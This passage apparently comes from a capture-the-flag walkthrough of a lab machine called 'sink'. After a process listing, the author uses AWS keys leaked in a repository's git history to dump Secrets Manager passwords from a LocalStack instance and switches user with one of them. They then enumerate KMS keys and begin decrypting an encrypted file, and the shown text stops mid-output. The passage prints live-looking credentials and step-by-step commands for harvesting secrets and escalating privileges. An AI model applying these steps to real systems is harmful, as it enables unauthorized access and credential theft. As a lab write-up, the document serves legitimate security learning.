root        3298  0.0  0.5  63508 20228 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3953  0.0  0.6 106312 26800 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4186  0.2  0.8 132392 33460 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3954  0.0  0.1  27992  4296 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4174  0.2  0.5  63908 20812 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5455  0.1  0.4 356196 16452 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3164  0.0  0.1 108700  6300 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/3a88a256bfea60473c4bb9ba606b5d00bf7cedd57fb6b9ce4051b59437750fbe -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3292  0.0  0.4  63508 20148 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4014  0.0  0.6 106312 26796 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4351  0.2  0.8 132132 33340 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4016  0.0  0.1  27992  4444 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4019  0.2  0.5  63908 20828 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4797  0.1  0.4 356196 16372 ?        Sl   15:28   0:20  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3170  0.0  0.1 108700  5968 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ecccc85cc66654f646bd67a701da06876bdd74fe252864ecaf8b883c867f057b -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3443  0.0  0.4  63512 20124 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4095  0.0  0.6 106312 26724 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4236  0.2  0.8 132140 33484 ?        R    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4096  0.0  0.1  27992  4348 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4213  0.2  0.5  63908 20916 ?        R    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        4903  0.1  0.4 356196 16428 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3201  0.0  0.1 108700  5200 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/4348cfb57a494da8071c4550915a05c79960fc34fc0e14ae92681a505e15dfda -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3452  0.0  0.5  63508 20184 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3839  0.0  0.6 106312 26688 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       3942  0.2  0.8 132140 33576 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3840  0.0  0.1  27992  4336 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3841  0.2  0.5  63908 20828 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5010  0.1  0.4 356196 16436 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3221  0.0  0.1 108700  5200 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/ed03a109bb55eef306fcc6dae07b0ba6d0aa5daac480ff42303c2f12a8ab0963 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3458  0.0  0.5  63508 20268 ?        Ss   15:27   0:06  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        3870  0.0  0.6 106312 26700 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4129  0.2  0.8 132136 33564 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    3871  0.0  0.1  27992  4424 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      3873  0.2  0.5  63908 20952 ?        S    15:28   0:33  |       \_ python3 /home/bot/bot.py
root        5404  0.1  0.4 356196 16364 ?        Sl   15:29   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3450  0.0  0.1 110108  5136 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/3d55d9da52f0abb4413fb45779148dde0e2249cb5f1bf6f9daab4775c60679ce -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3569  0.0  0.5  63508 20232 ?        Ss   15:27   0:07  |   \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4028  0.0  0.6 106312 26924 ?        S    15:28   0:02  |       \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4211  0.2  0.8 132136 33452 ?        S    15:28   0:33  |       |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4029  0.0  0.1  27992  4332 ?        S    15:28   0:05  |       \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4030  0.2  0.5  63908 20752 ?        S    15:28   0:34  |       \_ python3 /home/bot/bot.py
root        4743  0.1  0.4 356196 16336 ?        Sl   15:28   0:19  |       \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        3469  0.0  0.1 110108  5768 ?        Sl   15:27   0:00  \_ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/2bc3df8be4ea361041e8da478cc3e49b4ab0ea3362e5d59cf69573d6aa2dc493 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root        3585  0.0  0.5  63508 20336 ?        Ss   15:27   0:07      \_ /usr/bin/python /usr/bin/supervisord -c /etc/supervisor/conf.d/supervisord.conf
root        4067  0.0  0.6 106312 26708 ?        S    15:28   0:02          \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
david       4192  0.2  0.8 132132 33580 ?        S    15:28   0:33          |   \_ /usr/bin/python3 /usr/local/bin/gunicorn --config=/etc/gunicorn.conf.py app:app
systemd+    4069  0.0  0.1  27992  4296 ?        S    15:28   0:05          \_ /home/haproxy/haproxy -f /home/haproxy/haproxy.cfg
marcus      4070  0.2  0.5  63908 20912 ?        S    15:28   0:33          \_ python3 /home/bot/bot.py
root        5243  0.1  0.4 356196 16372 ?        Sl   15:29   0:20          \_ /usr/bin/python3 /usr/bin/fail2ban-server --async -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid --loglevel INFO --logtarget /var/log/fail2ban.log --syslogsocket auto
root        1151  0.0  0.5 544480 21836 ?        Ssl  15:27   0:10 /usr/bin/python3 /usr/bin/fail2ban-server -xf start
daemon      1152  0.0  0.0   3792  2320 ?        Ss   15:27   0:00 /usr/sbin/atd -f
root        1172  0.0  0.0   5828  1884 tty1     Ss+  15:27   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root        1174  0.0  0.5 107872 20732 ?        Ssl  15:27   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1192  0.0  0.1  12168  7296 ?        Ss   15:27   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root       14512  0.0  0.2  13776  8992 ?        Ss   19:15   0:00  \_ sshd: marcus [priv]
marcus     14643  0.0  0.1  13908  6032 ?        S    19:15   0:00      \_ sshd: marcus@pts/0
marcus     14644  0.0  0.1   8276  5236 pts/0    Ss   19:15   0:00          \_ -bash
marcus     15303  0.0  0.0   9308  3816 pts/0    R+   19:33   0:00              \_ ps auxwww --forest
mysql       1245  0.2  9.8 1743604 396684 ?      Ssl  15:27   0:31 /usr/sbin/mysqld
root        1777  0.0  2.2 1606932 92692 ?       Ssl  15:27   0:05 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root        2554  0.0  0.1 548504  4444 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 4566 -container-ip 172.18.0.2 -container-port 4566
root        2559  0.0  0.0 475924  3424 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6005 -container-ip 172.17.0.2 -container-port 8080
root        2610  0.0  0.0 548248  2932 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6009 -container-ip 172.17.0.3 -container-port 8080
root        2655  0.0  0.0 400784  2936 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6001 -container-ip 172.17.0.4 -container-port 8080
root        2671  0.0  0.0 548248  3012 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6000 -container-ip 172.17.0.5 -container-port 8080
root        2727  0.0  0.0 475924  2920 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6008 -container-ip 172.17.0.6 -container-port 8080
root        2811  0.0  0.0 474516  2964 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6004 -container-ip 172.17.0.7 -container-port 8080
root        2857  0.0  0.0 402192  2912 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6013 -container-ip 172.17.0.8 -container-port 8080
root        2878  0.0  0.0 548248  2948 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6007 -container-ip 172.17.0.9 -container-port 8080
root        2928  0.0  0.0 549656  3032 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6002 -container-ip 172.17.0.10 -container-port 8080
root        2978  0.0  0.0 474516  3048 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6011 -container-ip 172.17.0.11 -container-port 8080
root        3020  0.0  0.0 474516  3052 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6014 -container-ip 172.17.0.12 -container-port 8080
root        3054  0.0  0.0 400784  2956 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6012 -container-ip 172.17.0.13 -container-port 8080
root        3086  0.0  0.0 400784  3028 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6010 -container-ip 172.17.0.14 -container-port 8080
root        3114  0.0  0.0 548248  3056 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6003 -container-ip 172.17.0.15 -container-port 8080
root        3149  0.0  0.0 400784  2960 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6015 -container-ip 172.17.0.16 -container-port 8080
root        3229  0.0  0.0 400784  3020 ?        Sl   15:27   0:00  \_ /usr/bin/docker-proxy -proto tcp -host-ip 172.17.0.1 -host-port 6006 -container-ip 172.17.0.17 -container-port 8080
root        2480  0.0  0.1  38036  4712 ?        Ss   15:27   0:00 /usr/lib/postfix/sbin/master -w
postfix     2495  0.0  0.1  38348  6232 ?        S    15:27   0:00  \_ qmgr -l -t unix -u
postfix    13290  0.0  0.1  38308  6052 ?        S    18:44   0:00  \_ pickup -l -t unix -u -c
marcus     14534  0.0  0.2  18784 10112 ?        Ss   19:15   0:00 /lib/systemd/systemd --user
marcus     14535  0.0  0.0 169148  3672 ?        S    19:15   0:00  \_ (sd-pam)

Looking through the open processes, we can see that this is a containerized app. To backtrack a moment, I checked the other repos in Gitea. There is a repo called Serverless-Plugin. In the history, there is Dockerfile being setup with localstack. I use aws [tab] [tab] to see what bash completions shows. There is a command called awslocal.

marcus@sink:/home$ aws
aws                   aws_bash_completer    aws.cmd               aws_completer         awslocal              awslocal.bat          aws_zsh_completer.sh

I went back to checkout the repos, and I wanted to take a look at Log Management. Since we know that there is an AWS service being used on the Gitea server. I checked the Log_Management commits, and found one of the history. One of the history shows AWS secrets being committed to the git repo.

I went ahead and setup the AWS credentials.

marcus@sink:/home$ awslocal lambda list-functions

An error occurred (400) when calling the ListFunctions operation: 
marcus@sink:/home$ aws cloudwatch describe-insight-rules
You must specify a region. You can also configure your region by running "aws configure".
marcus@sink:/home$ aws configure
AWS Access Key ID [None]: AKIAIUEN3QWCPSTEITJQ
AWS Secret Access Key [None]: paVI8VgTWkPI3jDNkdzUMvK4CcdXO2T7sePX0ddF
Default region name [None]: eu
Default output format [None]: 
marcus@sink:/home$ aws cloudwatch describe-insight-rules

Could not connect to the endpoint URL: "https://monitoring.eu.amazonaws.com/"

Check logs

awslocal logs describe-log-groups
{
    "logGroups": [
        {
            "logGroupName": "cloudtrail",
            "creationTime": 1633203781293,
            "metricFilterCount": 0,
            "arn": "arn:aws:logs:us-east-1:000000000000:log-group:cloudtrail",
            "storedBytes": 91
        }
    ]
}
marcus@sink:/home$ awslocal logs describe-log-streams --log-group-name cloudtrail
{
    "logStreams": [
        {
            "logStreamName": "20201222",
            "creationTime": 1633204081989,
            "firstEventTimestamp": 1126190184356,
            "lastEventTimestamp": 1533190184356,
            "lastIngestionTime": 1633204082014,
            "uploadSequenceToken": "1",
            "arn": "arn:aws:logs:us-east-1:259:log-group:cloudtrail:log-stream:20201222",
            "storedBytes": 91
        }
    ]
}
marcus@sink:/home$ awslocal logs describe-log-streams --log-group-name cloudtrail --log-stream-name 20201222
{
    "logStreams": [
        {
            "logStreamName": "20201222",
            "creationTime": 1633204081989,
            "firstEventTimestamp": 1126190184356,
            "lastEventTimestamp": 1533190184356,
            "lastIngestionTime": 1633204082014,
            "uploadSequenceToken": "1",
            "arn": "arn:aws:logs:us-east-1:259:log-group:cloudtrail:log-stream:20201222",
            "storedBytes": 91
        }
    ]
}

awslocal logs get-log-events --log-group-name cloudtrail --log-stream-name 20201222
{
    "events": [
        {
            "timestamp": 1126190184356,
            "message": "RotateSecret",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1244190184360,
            "message": "TagResource",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1412190184358,
            "message": "PutResourcePolicy",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184356,
            "message": "AssumeRole",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184358,
            "message": "PutScalingPolicy",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1433190184360,
            "message": "RotateSecret",
            "ingestionTime": 1633204141150
        },
        {
            "timestamp": 1533190184356,
            "message": "RestoreSecret",
            "ingestionTime": 1633204141150
        }
    ],
    "nextForwardToken": "f/00000000000000000000000000000000000000000000000000000006",
    "nextBackwardToken": "b/00000000000000000000000000000000000000000000000000000000"
}

Check Secrets Manager

awslocal secretsmanager list-secrets
{
    "SecretList": [
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-gBBmE",
            "Name": "Jenkins Login",
            "Description": "Master Server to manage release cycle 1",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "64b317d7-c211-4bf6-a194-7a0f199ea695": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-PQsKL",
            "Name": "Sink Panel",
            "Description": "A panel to manage the resources in the devnode",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "daece332-d665-494e-b16e-1d10a805f2a3": [
                    "AWSCURRENT"
                ]
            }
        },
        {
            "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-ilvIs",
            "Name": "Jira Support",
            "Description": "Manage customer issues",
            "KmsKeyId": "",
            "RotationEnabled": false,
            "RotationLambdaARN": "",
            "RotationRules": {
                "AutomaticallyAfterDays": 0
            },
            "Tags": [],
            "SecretVersionsToStages": {
                "9711b975-0382-4ab5-9e58-108963b139db": [
                    "AWSCURRENT"
                ]
            }
        }
    ]
}

Check out secret value

awslocal secretsmanager get-secret-value --secret-id "Jenkins Login"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-gBBmE",
    "Name": "Jenkins Login",
    "VersionId": "64b317d7-c211-4bf6-a194-7a0f199ea695",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"R);\\)ShS99mZ~8j\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

awslocal secretsmanager get-secret-value --secret-id "Sink Panel"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-PQsKL",
    "Name": "Sink Panel",
    "VersionId": "daece332-d665-494e-b16e-1d10a805f2a3",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"Welcome123!\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

awslocal secretsmanager get-secret-value --secret-id "Jira Support"
{
    "ARN": "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-ilvIs",
    "Name": "Jira Support",
    "VersionId": "9711b975-0382-4ab5-9e58-108963b139db",
    "SecretString": "{\"username\":\"[email protected]\",\"password\":\"EALB=bcC=`a7f2#k\"}",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1633188560
}

Since we already checked the home directories, we can try logging in with david

marcus@sink:/home$ su david
Password:
david@sink:/home$

Enumerate david home directory

david@sink:~$ find Projects/ -type -ls
find: Unknown argument to -type: -
david@sink:~$ find Projects/ -type f -ls
   393283      4 -rw-r-----   1 david    david         512 Feb  1  2021 Projects/Prod_Deployment/servers.enc
david@sink:~$ file Projects/Prod_Deployment/servers.enc 
Projects/Prod_Deployment/servers.enc: data
david@sink:~$ xxd Projects/Prod_Deployment/servers.enc 
00000000: 9973 2cfb c64b 129f 64ac 62cb 253d 981c  .s,..K..d.b.%=..
00000010: b807 40ff ee44 9612 7d7f 984e a6ab ef06  [email protected]..}..N....
00000020: 9bbc e43c 3d2b 8fc1 4140 9842 61f3 aab7  ...<[email protected]...
00000030: 91a5 119a 7471 affb 2666 f914 e8fa 7428  ....tq..&f....t(
00000040: f57b c9ed ac3f 5d21 bcf2 4317 69a4 35c2  .{...?]!..C.i.5.
00000050: 0456 27f7 45a3 14d3 c8d9 8bb5 3f82 1672  .V'.E.......?..r
00000060: a17b 1e33 a104 72ef 5cd6 0629 0ea6 7be0  .{.3..r.\..)..{.
00000070: 2304 87b0 286a c92c 2ecc 0224 9658 2344  #...(j.,...$.X#D
00000080: df72 f4e5 5f1f 385c 17c2 5ac2 bb71 3c83  .r.._.8\..Z..q<.
00000090: 6f84 ae82 102a f4c6 3cf5 0ea5 b7b8 27c3  o....*..<.....'.
000000a0: a230 1bfb 521e 2f5a d4c6 3c79 b942 c023  .0..R./Z..<y.B.#
000000b0: 0dc1 1ac5 438e 31f2 9de1 4b61 4bc5 97b6  ....C.1...KaK...
000000c0: 88a5 2ba6 2c94 0e67 5386 9149 3dc3 37bb  ..+.,..gS..I=.7.
000000d0: 1897 53e7 2ec9 9260 c734 365a 5d06 a9a8  ..S....`.46Z]...
000000e0: f446 9543 db0d b024 6ad0 0670 a7a2 e6a1  .F.C...$j..p....
000000f0: 383d 525d 3dc3 c2b5 0c59 7c9e 34c7 39da  8=R]=....Y|.4.9.
00000100: 55a8 dda0 7e9a afee 84bc 5c4d e192 2261  U...~.....\M.."a
00000110: c971 f518 610a 97a0 8ace 1dc4 bb3b 5585  .q..a........;U.
00000120: a1a3 2f32 d200 97eb 91b2 5195 484c 2253  ../2......Q.HL"S
00000130: ab15 7bd9 cc0a ecaf aec6 ec43 4378 ea38  ..{........CCx.8
00000140: eba3 9875 9c59 9399 9d02 d57a fdec 6a3f  ...u.Y.....z..j?
00000150: a479 89c6 01b5 9719 ce7a 9b20 94ba cf31  .y.......z. ...1
00000160: 7739 17a9 451f 568a c65c c554 0c46 2963  w9..E.V..\.T.F)c
00000170: 40cd 3973 182f 879c 15e3 ba02 e93f c4a1  @.9s./.......?..
00000180: a5bd b81c f767 b7f7 c5fd d75a f2ac 9a31  .....g.....Z...1
00000190: c619 08e9 8b38 3ba6 b36f 913a dacf 2780  .....8;..o.:..'.
000001a0: 93b9 a892 6ce5 89ba 1790 e94f efe4 06de  ....l......O....
000001b0: 4121 7ddd 1176 f22c a203 dd39 4823 518b  A!}..v.,...9H#Q.
000001c0: 77a3 1831 fae4 e5af e9ac 3556 74df f136  w..1......5Vt..6
000001d0: 9110 f1f9 64d2 dacd 35b9 268f 24bc ba89  ....d...5.&.$...
000001e0: 684b 5921 244d 5049 ac24 7afb f54d 558e  hKY!$MPI.$z..MU.
000001f0: 9a2f 3f37 8f4c a783 4d1d 2aa2 c5bf 189f  ./?7.L..M.*.....

Going back to the repos, I want to look at the Key_Management. I did notice that there were several tools being used, one is AWS KMS.

david@sink:~$ awslocal help | grep -i kms
       o kms
david@sink:~$ awslocal kms list-keys
{
    "Keys": [
        {
            "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac"
        },
        {
            "KeyId": "16754494-4333-4f77-ad4c-d0b73d799939",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/16754494-4333-4f77-ad4c-d0b73d799939"
        },
        {
            "KeyId": "2378914f-ea22-47af-8b0c-8252ef09cd5f",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2378914f-ea22-47af-8b0c-8252ef09cd5f"
        },
        {
            "KeyId": "2bf9c582-eed7-482f-bfb6-2e4e7eb88b78",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/2bf9c582-eed7-482f-bfb6-2e4e7eb88b78"
        },
        {
            "KeyId": "53bb45ef-bf96-47b2-a423-74d9b89a297a",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/53bb45ef-bf96-47b2-a423-74d9b89a297a"
        },
        {
            "KeyId": "804125db-bdf1-465a-a058-07fc87c0fad0",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0"
        },
        {
            "KeyId": "837a2f6e-e64c-45bc-a7aa-efa56a550401",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/837a2f6e-e64c-45bc-a7aa-efa56a550401"
        },
        {
            "KeyId": "881df7e3-fb6f-4c7b-9195-7f210e79e525",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/881df7e3-fb6f-4c7b-9195-7f210e79e525"
        },
        {
            "KeyId": "c5217c17-5675-42f7-a6ec-b5aa9b9dbbde",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/c5217c17-5675-42f7-a6ec-b5aa9b9dbbde"
        },
        {
            "KeyId": "f0579746-10c3-4fd1-b2ab-f312a5a0f3fc",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f0579746-10c3-4fd1-b2ab-f312a5a0f3fc"
        },
        {
            "KeyId": "f2358fef-e813-4c59-87c8-70e50f6d4f70",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/f2358fef-e813-4c59-87c8-70e50f6d4f70"
        }
    ]
}

Keep looking

david@sink:~$ awslocal kms describe-key --key-id 0b539917-5eff-45b2-9fa1-e13f0d2c42ac
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/0b539917-5eff-45b2-9fa1-e13f0d2c42ac",
        "CreationDate": 1609757848,
        "Enabled": false,
        "Description": "Encryption and Decryption",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Disabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"'
cut: you must specify a list of bytes, characters, or fields
Try 'cut --help' for more information.
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"' -f4
0b539917-5eff-45b2-9fa1-e13f0d2c42ac
16754494-4333-4f77-ad4c-d0b73d799939
2378914f-ea22-47af-8b0c-8252ef09cd5f
2bf9c582-eed7-482f-bfb6-2e4e7eb88b78
53bb45ef-bf96-47b2-a423-74d9b89a297a
804125db-bdf1-465a-a058-07fc87c0fad0
837a2f6e-e64c-45bc-a7aa-efa56a550401
881df7e3-fb6f-4c7b-9195-7f210e79e525
c5217c17-5675-42f7-a6ec-b5aa9b9dbbde
f0579746-10c3-4fd1-b2ab-f312a5a0f3fc
f2358fef-e813-4c59-87c8-70e50f6d4f70
david@sink:~$ awslocal kms list-keys | grep KeyId | cut -d'"' -f4 | while read id; do desc=$(awslocal kms describe-key --key-id $id); use=$(echo $desc | cut -d'"' -f26); echo $desc | grep -q Disabled || echo "$id  $use"; done
804125db-bdf1-465a-a058-07fc87c0fad0  ENCRYPT_DECRYPT
c5217c17-5675-42f7-a6ec-b5aa9b9dbbde  SIGN_VERIFY
david@sink:~$ awslocal kms describe-key --key-id 804125db-bdf1-465a-a058-07fc87c0fad0
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "804125db-bdf1-465a-a058-07fc87c0fad0",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0",
        "CreationDate": 1609757999,
        "Enabled": true,
        "Description": "Encryption and Decryption",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "EncryptionAlgorithms": [
            "RSAES_OAEP_SHA_1",
            "RSAES_OAEP_SHA_256"
        ]
    }
}

Decrypt

awslocal kms decrypt --key-id 804125db-bdf1-465a-a058-07fc87c0fad0 --ciphertext-blob fileb://servers.enc --encryption-algorithm RSAES_OAEP_SHA_256
{
    "KeyId": "arn:aws:kms:us-east-1:000000000000:key/804125db-bdf1-465a-a058-07fc87c0fad0",
